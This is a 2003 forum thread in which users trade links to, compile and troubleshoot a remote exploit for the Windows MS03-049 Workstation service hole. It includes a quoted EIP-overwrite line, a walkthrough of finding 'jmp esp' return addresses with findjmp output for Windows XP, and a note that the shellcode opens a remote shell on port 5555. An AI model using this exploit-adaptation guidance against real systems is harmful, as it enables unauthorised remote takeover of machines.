Windows Workstation ms03-049 remote exploit for w2k&fat
Date: 2003-11-13

Author : Hanabishi
Download : http://www.security-corporation.com/downlo.../ms03-049-w2k.c

hope I've some luck compiling this one!!

Compiled with Visual C, no error codes due compiling and builidng but an error while using the code. I've checked the code but can't find a explaination for it..
Hope someone else will.

Good luck all

Is this code still for 2000 SP4 FAT?

oops

can anyone compile??

couldnt compile

Is it good? If yes please compile it for us.

compiled, posting it now in File Downloads.

hmm im new here..
can u give me direct line to this section?
File Download..
thanks

u need 50 posts before the download section appears
just to let u know

heres the scanner for the exploit , x-scan 5 with ms03-049 scanner plugin
http://down.77169.com/

Um sorry but i dont understand chinesse, can you give me a link to scaner, eploit also needed

hmm let me try compiling this one if i can make it i'll post

thx - compiled by myself until i have access to the download section

compiled well but there is a flaw in the code. It don't work because of an error while executing the exploit. Don't know where the error is because my c++ is not that good.

thx QuantumTopology for the translation but i think the download doesn't work at all. First you need to enter www.77169.com directly without a translater to get the download working but there is a problem with the server. Try again later.

Maybe someone can upload it directly to this place!

Regards

this is de normale link http://www.77169.com/Soft_Show.asp?SoftID=374

but i olso can't download it.

you have to follow this way :

enter in the site here : http://down.77169.com/

after go to: http://down.77169.com/Soft_NewElite.asp (clic on the green link in the top of the page on your right)

after select your program

and clic on the link to download it

got the same problem! This super chineesee site is so fast ... ;-)!

FTP Mirrors are down, can't connect!

Can someone upload x-scan v.5 mb here`?

Exploit @ http://www.k-otik.com/exploits/11.12.MS03-049PoC.c.php

Here it says *(unsigned int *)(&szBuffer[2017]) = 0x74fdee63;
// eip (jmp esp @ msafd.dll, useopcode search engine for more, but
// be aware that a call esp willchange the offset in the stack)

Must use the offset suitable for ur windows version(lang, 2k or xp & SPs) instead of 0x74fdee63.
The exploit says u can obtain the offset if u find the memory address for "jmp esp" in msafd.dll. For that, u can use a tool called FINDJMP (http://www.i2s-lab.com/Free-Tools/Findjmp.exe)

Example->

C:\Findjmp msafd.dll esp

Scanning msafd.dll for code useable with the esp register
0x77E42C75 jmp esp
0x77E44A50 jmp esp
Finished Scanning msafd.dll for code useable with the esp register
Found 2 usable addresses

However, this only works on Win2k. If u do the same on a WinXP, it wont find any address for "jmp esp" in msafd.dll. (dlls are different in different Windows versions) U can also check metasploit.com and see that WinXp gets no memory address for "jmp esp" in msafd.dll.

So, i was wondering which *.dll in my WinXp could i use in order to finding the memory address for "jmp esp" so i can use it as the offset in this exploit??
Then, it was told me to use wkssvc.dll instead for WINXP.

This is what i get wit findjmp on my wkssvc.dll:

c:\findjmp wkssvc.dll esp
Scanning wkssvc.dll for code useable with the esp register
0x75109975 push esp - ret
0x7511A747 jmp esp
0x7511C890 push esp - ret
Finished Scanning wkssvc.dll for code useable with the esp register
Found 3 usable addresses

So, in the exploit code, i should write the 0x7511A747 directly in this line:

*(unsigned int *)(&szBuffer[2017]) = 0x7511A747;
// eip (jmp esp @ msafd.dll, useopcode search engine for more, but
// be aware that a call esp willchange the offset in the stack)

and it'd work, uh?????????????????

Looking at the exploit code... i changed the three 0.0.0.0 ips into 127.0.0.1 so i'd see the results on my XP.

Ok...... after compiling and linking wit mpr.lib (=mprlib.a) an error occurs during the exploit execution, a new windows appears showing this message:


***********************************
Microsoft Visual c++ Debug Library

Debug Error!

Program: c:\xploit.exe
Module:
File: i386\chkesp.c
Line: 42

The value of ESP was not properly saved across a function call. This is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention.

Anular, Reintentar, Omitir

***********************************

Ahhh... the shellcode works, it opens a 5555 port and u can connect remotely with telnet or nc. However, my whole exploit execution doesnt get a new shell even open 5555 on my XP

Any ideas??

PD: I know for sure that this exploit works on a Win 2k sp4, so all i wanted was changing the offset for my Win Xp nosp instead!!!! For now, i'm not sure if this exploits runs on a WinXp cause its said that wkssvc.dll vuln. exploits are for Win2k + FAT32!! Anybody can confirm that this exploit runs on WinXp for sure??


Salu2

thanx for this exploit compiled it succefully with visual C

thanks for the link also (scan exploit)

gonna give the scanner a try
thx mate

...will also have a look at the exploit code

Does this exploit really works fine ? Because i've compiled it without errors but no results ...

Nice. gonna check it out. Hopinh with sucess

very nice

uhm,... you need a password if you want to unpack it. anyone got this?

B.T.W.

The Pass is www.77169.com

And be careful my AV dectected an IRC Trojan Virus on one of the files.

De nada BillyJawz!! This tool (findjmp) helped me a lot when i needed to get the offsets. At least, US guys can search them in metasploit, but i cant find there the offsets for my Win Spanish....

salu2

This exploit looks promising, is the code clean ?

i cant compile...
any idea if this code is clean??

compiled succesfull althrou seems to be missing something..

cant compile with vis c ;

Me ether,
I cant compile it with vc++ :-(((

Hopefully i find a compled one.

Greetz

compiled it with no problem where's the attack button?

i search MS03-049 exploit by sbaa [v0.2].....any info?

thx a lot
Can somone compile it please

I got errors by compiling this sploit:

gcc.exe -c wks_3.c -o wks_3.o -I"c:/Dev-Cpp/include"

wks_3.c: In function `main':
wks_3.c:152: warning: passing arg 2 of `MultiByteToWideChar' makes integer from pointer without a cast
wks_3.c:154: `try' undeclared (first use in this function)
wks_3.c:154: (Each undeclared identifier is reported only once
wks_3.c:154: for each function it appears in.)
wks_3.c:154: parse error before '{' token
wks_3.c: At top level:
wks_3.c:159: ISO C requires a named argument before `...'

wks_3.c:166: parse error before string constant
wks_3.c:166: warning: conflicting types for built-in function `printf'
wks_3.c:166: warning: data definition has no type or storage class
wks_3.c:167: parse error before '.' token
wks_3.c:167: conflicting types for `WNetCancelConnection2A'
c:/Dev-Cpp/include/winnetwk.h:252: previous declaration of `WNetCancelConnection2A'
wks_3.c:167: warning: data definition has no type or storage class
wks_3.c:168: warning: parameter names (without types) in function declaration
wks_3.c:168: warning: data definition has no type or storage class
wks_3.c:169: parse error before "return"

make.exe: *** [wks_3.o] Error 1

Execution terminated

w00t #@!#!@#
cool exploit but who compile it ? ?

hmm i'll have to check this one

thier is another version of this exploit that isn't file system dependent for XP, search the forum.
This exploit would be awesome if it wasn't only FAT, any decent server uses NTFS.

blah